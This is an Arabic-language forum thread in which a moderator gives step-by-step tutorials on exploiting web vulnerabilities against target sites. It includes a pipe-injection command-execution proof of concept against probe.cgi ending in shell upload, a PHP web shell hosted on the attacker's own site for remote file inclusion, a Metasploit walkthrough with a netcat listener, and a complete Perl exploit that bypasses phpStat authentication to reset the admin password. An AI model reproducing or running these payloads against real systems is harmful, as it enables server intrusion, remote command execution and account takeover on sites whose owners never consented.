تذكرنــي
التسجيل التعليمات التقويم البحث مشاركات اليوم اجعل كافة الأقسام مقروءة

أدخل بريدك الإلكتروني هنا  ليصلك جديدنا

اسلاميات ، مذكرات تخرج ، مذكرات تعليمية ، برامج اسلامية ، برامج عامة ، التحضير للبكلورياء ،شهادة التعليم المتوسط،شهادة التعليم الابتدائي ، التوظيف المختلف جميع الاختصاصات 

للتسجيل اضغط هـنـا

Custom Search

ماشاء الله تبارك الله ماشاء الله لاقوة الا بالله




الملاحظات

قسم برامج الحماية والوقاية من الفيروسات يختص في أساليب الحماية من أخطار الإختراق والفيروسات

اضافة رد

 
أدوات الموضوع انواع عرض الموضوع

رقم المشاركة : ( 1 )
الصورة الرمزية صوت القصيد
صوت القصيد
مشرف
صوت القصيد غير متواجد حالياً
 
رقم العضوية : 48
تاريخ التسجيل : Nov 2009
مكان الإقامة :
عدد المشاركات : 2,253
عدد النقاط : 20
قوة التقييم : صوت القصيد is on a distinguished road
برنامج شرح انواع الثغرات وطريقة استغلالها

كُتب : [ 30-07-2010 - 12:52 ]


انا : صوت القصيد


السلام عليكم
في هذا الموضوع سوف نشرح بعض أنواع الثغرات وطريقة استغلالها
...
والثغرات بأختصار هي اخطاء برمجية يقع فيها المبرمجين تؤدي تلك الأخطاء الى استغلالها من قبل الهكر في أختراق النظام المستهدف
وهناك اخطاء برمجية كثيرة جدآ ومختلفة وكل خطاء لة استغلال معين

============================== =====
|1|
ثغرات تنفيذ الاوامر Command Execution
============================== =====
هذا النوع من الثغرات يحدث نتيجه استخدام دوال تنفيذ الاوامر في لغه PHP بشكل خاطئ ويتم استغلال الخطاء مباشرة في المتصفح بتنفيذ اوامر الليونكس
وتنقسم دوال تنفيذ الاوامر في لغة php
التي تنفذ بشكل مباشر الى system و popen و shell_exec و exec
هذه الدوال تنفذ اي برنامج نظام يمرر لها بشكل مباشر
وكمثال انظر الى هذا الاكسبلويت
كود:
Authors ....... spher3 (spher3 at fatalimpulse dot net)
Date .......... 04-07-2008
Product ....... probe.cgi
Type .......... Remote Command Execution

o Info:
================
That ****** is used to open file '.dat'.

o Vulnerable Code:
================
..
23 [...]
24 $old = $query->param('olddat');
25 [...]
..
..
34 [...]
35 open (VF, "$olddat");
36 [...]
..
(24) At this line, the cgi param 'olddat' is associated to one database.
This variable isn't checked by anyone matching, so you can open
all file that you want. (35) At this line the ****** open the file
that you had chosen. With pipe `|`
is possible to execute arbitrary code on the shell.

o Proof of concept:
================

http://????.com/cgi-bin/probe.cgi?olddat=|id|
uid=99(www) gid=99(www)


نفهم من هذا انه توجد ثغرة من نوع Command Execution
والملف المصاب هو
probe.cgi
..والان لنرى كيف يتم استغلال هذه الثغرة
|
http://????.com/cgi-bin/probe.cgi?olddat=|id

????.com= الموقع الافتراضي المستهدف
cgi-bin = مجلد cgi-bin
probe.cgi = الملف المصاب
olddat = مكان الاصابة داخل الملف

|id| : تعطي صلاحيتك بالسيرفر
بعد كتابتها اضغط على انتر سوف يظهر التالي
uid=99(www) gid=99(www)

والان نريد ان نعرف مكاننا على السيرفر
نكتب pwd في مكان id هكذا :
|http://????.com/cgi-bin/probe.cgi?olddat=|pwd
فيظهر لنا هذا:
/home/.????/cgi.bin

والان لنرى هل مسموح لنا برفع ملف ام لا؟؟
نضع مكان id
which wget هكذا :
|http://????.com/cgi-bin/probe.cgi?olddat=|which wget
اذا ظهر لك هذا /؟؟؟/؟؟؟/wget معناه مسموح برفع ملف
(علامات الاستفهام متغيرة اهم شيئ ان تظهر
wget )



والان نريد ان نعرف التصاريح للملفات والمجلدات لنعرف اين يمكننا الرفع:
منذ قليل قلنا ان مكاننا هو
/home/.????/cgi.bin
ونريد الخروج من ملف cgi.bin الى المجلد الرئيسي
لذلك
نضع مكان الـ id
cd /home/.???/;pwd
هكذا:
|
http://????.com/cgi-bin/probe.cgi?olddat=|cd /home/.???/;pwd
ولكي نرى المجلدات والملفات والتصريحات نستعمل الامر
ls%20-al
;هكذا:
|
http://????.com/cgi-bin/probe.cgi?olddat=|cd /home/;ls%20-al

ثم نبحث عن المجلد الذي له تصريح :
drwxrwxrwx = 777
لنفرض انك حصلت أمام مجلد الصور أو uploads تصريح ( drwxrwxrwx = 777 )
ولندخل اليه نكتب هكذا:

|http://????.com/cgi-bin/probe.cgi?olddat=|cd /home/.???/uploads/;pwd

والان كل ما عليك هو رفع الشل وبهذا نكون اكملنا طريقة استغلال هذا النوع من الثغرات


***



توقيع : صوت القصيد















رد مع إقتباس
بياناتي
 رقم المشاركة : ( 2 )
صوت القصيد
مشرف
رقم العضوية : 48
تاريخ التسجيل : Nov 2009
مكان الإقامة :
عدد المشاركات : 2,253
عدد النقاط : 20

صوت القصيد غير متواجد حالياً

افتراضي رد: شرح انواع الثغرات وطريقة استغلالها

كُتب : [ 30-07-2010 - 12:54 ]


انا : صوت القصيد



============================== =====

|2|
ثغرات File Inclusion
============================== =====

الثغرات المسماه Remote File Inclusion شبيهه بعمل Remote Command Execution

لكن الفرق يلزم
كود لرفعه لموقعك ومن ثم تأخذ رابطه وتستخدمه للاستغلال
مثال الاستغلال :

http://www.target.net/index.php?mode=http://site?&cmd

http://site = موقعك
?&cmd = كود مرفوع بموقعك
افتح النوت باد Notepad وادخل هذا الكود واحفظها باسم cmd.gif
كود:
<?
system($cmd);
?>
*/

وعند الاستغلال

http://www.target.net/index.php?mode=http://site.com/cmd.gif?&cmd=id

و id التي في الآخر نضع مكانها الاوامر التي استعملناها في النوع السابق من الثغرات
...


وكما قلنا ان الفرق بين الثغرتين السابقتين هو
أن Remote File Inclusion فيها كود ترفعه على موقعك وتستخدم الأوامر مكان الآي دي id ((رابط موقعك مع الـ id ))

و
Remote Command Execution تستخدم أوامر اللينكس على مباشرة بدون كود مرفوع (( الـ idفقط ))



...



توقيع : صوت القصيد















رد مع إقتباس
بياناتي
 رقم المشاركة : ( 3 )
صوت القصيد
مشرف
رقم العضوية : 48
تاريخ التسجيل : Nov 2009
مكان الإقامة :
عدد المشاركات : 2,253
عدد النقاط : 20

صوت القصيد غير متواجد حالياً

برنامج رد: شرح انواع الثغرات وطريقة استغلالها

كُتب : [ 30-07-2010 - 12:56 ]


انا : صوت القصيد


============================== =====
|3|

الثغرات المكتوبة بـ Framework
============================== =====

لاستغلال هذا النوع يجب ان يكون لدينا برنامج
Metasploit

- نعضع ملف الثغرة في المسار التالي

C:\Program Files\Metasploit Framework\home\framework\explo its

الثغرة تكون بامتداد PM
يمكن فتحها بالمفكرة ..ولاحظ اسم الثغرة:

الان نفتح برنامج
بالذهاب
إلي قائمة Start ثم Programs ثم Metasploit Framework ثم MSFConsole ...
هذه الصورة تم تصغيرها. إضغط هنا لعرض الصورة بالحجم الطبيعي. أبعاد الصورة الأصلية هي 666×331.

لتشغيل الثغرة اكتب هذا الامر
use php_vb3_0_6
هذه الصورة تم تصغيرها. إضغط هنا لعرض الصورة بالحجم الطبيعي. أبعاد الصورة الأصلية هي 667×330.
ولكي نستعرض الخيارات المتاحة نطبق الامر:
show payloads
هذه الصورة تم تصغيرها. إضغط هنا لعرض الصورة بالحجم الطبيعي. أبعاد الصورة الأصلية هي 665×327.

بعد ظهور الخيارات نختار منها
cmd_generic بالامر
set PAYLOAD cmd_generic

هذه الصورة تم تصغيرها. إضغط هنا لعرض الصورة بالحجم الطبيعي. أبعاد الصورة الأصلية هي 663×328.

والان لنرى الخيارات داخل الخيار
cmd_generic نطبق الامر
show options
هذه الصورة تم تصغيرها. إضغط هنا لعرض الصورة بالحجم الطبيعي. أبعاد الصورة الأصلية هي 664×329.

والان نستخدم الخيارات بالترتيب بالاوامر:
set RHOST server's IP
server's IP
= اي بي الموقع المستهدف
set RPATH /vb/misc.php

مكان الاصابة وهو متغير

ثم



set RPORT 80
ثم

set LHOST myIP
myiip
=الاي بي الخاصة بك
ثم

set LPORT 1234
والبورت انت حر في تغييره لكن يجب ان يكون نفسه عند الاتصال بالنت كات
والان استخدم اوامر اللينكس بالامر
set CMD id

هذه الصورة تم تصغيرها. إضغط هنا لعرض الصورة بالحجم الطبيعي. أبعاد الصورة الأصلية هي 666×328.

الان افتح النت كات وتنصت به بالامر
nc -vv -l -p 1234

وفي الاخير نستخدم الامر
exploit
هذه الصورة تم تصغيرها. إضغط هنا لعرض الصورة بالحجم الطبيعي. أبعاد الصورة الأصلية هي 662×328.

وسوف تظهر النتيجة بالنت كات


...
وهكذا نكون اكملنا الشرح لهذا النوع من الثغرات


توقيع : صوت القصيد















رد مع إقتباس
بياناتي
 رقم المشاركة : ( 4 )
صوت القصيد
مشرف
رقم العضوية : 48
تاريخ التسجيل : Nov 2009
مكان الإقامة :
عدد المشاركات : 2,253
عدد النقاط : 20

صوت القصيد غير متواجد حالياً

برنامج رد: شرح انواع الثغرات وطريقة استغلالها

كُتب : [ 30-07-2010 - 13:00 ]


انا : صوت القصيد


============================== =====
|4|
الثغرات المكتوبة بـالـ Perl ============================== =====

- لاستغلال هذا النوع من الثغرات يلزمنا برنامج Active Perl

- اغلب اكواد البرل تبدأ بـ:
#!/usr/bin/perl

مثال :
كود:
#!/usr/bin/perl
################################################## ###################
#T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m
################################################## ###################
# EXPLOIT FOR - PHPStat Setup.PHP Authentication Bypass Vulnerability
#
#Exploit By : A l p h a _ P r o g r a m m e r ( Sirus-v )
#E-Mail : [email protected]
#
#This Xpl Change Admin's Pass in This Portal !!
#Discovered by: SoulBlack
#
#Vulnerable Version : phpStat 1.5
#
################################################## ###################
# Gr33tz To ==> mh_p0rtal , Oil_karchack , Str0ke & AlphaST.Com
#
# So Iranian Hacking & Security Teams :
#
# Crouz , Shabgard , Simorgh-ev ,IHS , Emperor & GrayHatz.NeT
################################################## ###################


use IO::Socket;

if (@ARGV < 3)
{
print "\n==========================================\ n";
print " \n -- Exploit By Alpha Programmer --\n\n";
print " Trap-Set UnderGrounD Hacking Team \n\n";
print " Usage: <T4rg3t> <DIR> <Password>\n\n";
print "==========================================\n\ n";
print "Examples:\n\n";
print " phpStat.pl www.Site.com /phpstat/ 12345\n";
exit();
}

my $host = $ARGV[0];
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );

unless ($remote) { die "C4nn0t C0nn3ct to $host" }

print "C0nn3cted\n";

$http = "GET $ARGV[1]setup.php?check=yes&username=admin&password=$ARGV[2] HTTP/1.0\n";
$http .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)\n";
$http .= "Host: $host\n\n\n\n";

print "[+]Sending H3ll Packet ...\n";
print $remote $http;
sleep(1);
print "[+]Wait For Authentication Bypass ...\n";
sleep(100);
while (<$remote>)
{
}
print "[+]OK ! Now Goto $host$ARGV[1]setup.php And L0gin Whith:\n\n";
print "[+]User: admin\n";
print "[+]Pass: $ARGV[2]";
#


نفهم من هذا الكود:
ان البرنامج المصاب هو :- PHPStat Setup
نوع الثغرة :- Authentication Bypass Vulnerability
معلومات عن عمل الثغرة :- تقوم بتغير باس ورد الادمن
www.site.com = الموقع الافتراضي المستهدف

والان نأتي للاستغلال:
- نقوم بحفظ الكود بالامتداد pl
مثلا :
phpbb.pl
- نقوم بوضع الكود في المجلد bin
C:\Perl\bin
- نفتح الدوس وندخل للمجلد bin كما بالصورة

هذه الصورة تم تصغيرها. إضغط هنا لعرض الصورة بالحجم الطبيعي. أبعاد الصورة الأصلية هي 667×149.

ثم نكتب الامر التالي:
perl phpbb.pl www.site.com /phpBB2/ 2
لنحصل في الاخير على شيئ يشبه ما في هذه الصورة

هذه الصورة تم تصغيرها. إضغط هنا لعرض الصورة بالحجم الطبيعي. أبعاد الصورة الأصلية هي 661×365.


وبهذا نكمل هذا النوع من الثغرات

توقيع : صوت القصيد















رد مع إقتباس

اضافة رد

العلامات المرجعية

الكلمات الدلالية (Tags)
وطريقة, الثغرات, انواع, استغلالها, شرح


يتصفح الموضوع حالياً : 1 (0 عضو و 1 ضيف)
 
أدوات الموضوع
انواع عرض الموضوع

ضوابط المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا يمكنك اضافة مرفقات
لا يمكنك تعديل مشاركاتك

BB code متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
الحروف وطريقة نطقها العقيد قسم اللغة الفرنسية 1 25-02-2011 08:03
آخر أبحاث مرض السكر وطريقة العلاج منه سلاف شمس القسم العام 0 22-12-2010 19:01
مشاكل المراهقة وطريقة التعامل معها مرزوقي مسعود كتب علم النفس والفنون والتربية 4 20-11-2010 14:34
كبدة وطريقة ...طهيها. أطيب قلب قسم الحلويات 0 15-07-2010 11:28
الغوص بالمعدات وطريقة التعلم صوت القصيد قسم عالم البحار والمحيطات 1 10-04-2010 15:23

toolbar powered by Conduit

أدخل بريدك الإلكتروني هنا  ليصلك جديدنا

اسلاميات ، مذكرات تخرج ، مذكرات تعليمية ، برامج اسلامية ، برامج عامة ، التحضير للبكلورياء ،شهادة التعليم المتوسط،شهادة التعليم الابتدائي ، التوظيف المختلف جميع الاختصاصات 

Delivered by FeedBurner

Preview on Feedage: %D9%85%D9%86%D8%AA%D8%AF%D9%8A%D8%A7%D8%AA-%D8%A7%D9%84%D9%85%D8%B9%D8%B1%D9%81%D8%A9 Add to My Yahoo! Add to Google! Add to AOL! Add to MSN
Subscribe in NewsGator Online Add to Netvibes Subscribe in Pakeflakes Subscribe in Bloglines Add to Alesti RSS Reader
Add to Feedage.com Groups Add to Windows Live iPing-it Add to Feedage RSS Alerts Add To Fwicki
Add to Spoken to You

جميع الأوقات بتوقيت GMT +1. الساعة الآن 23:48.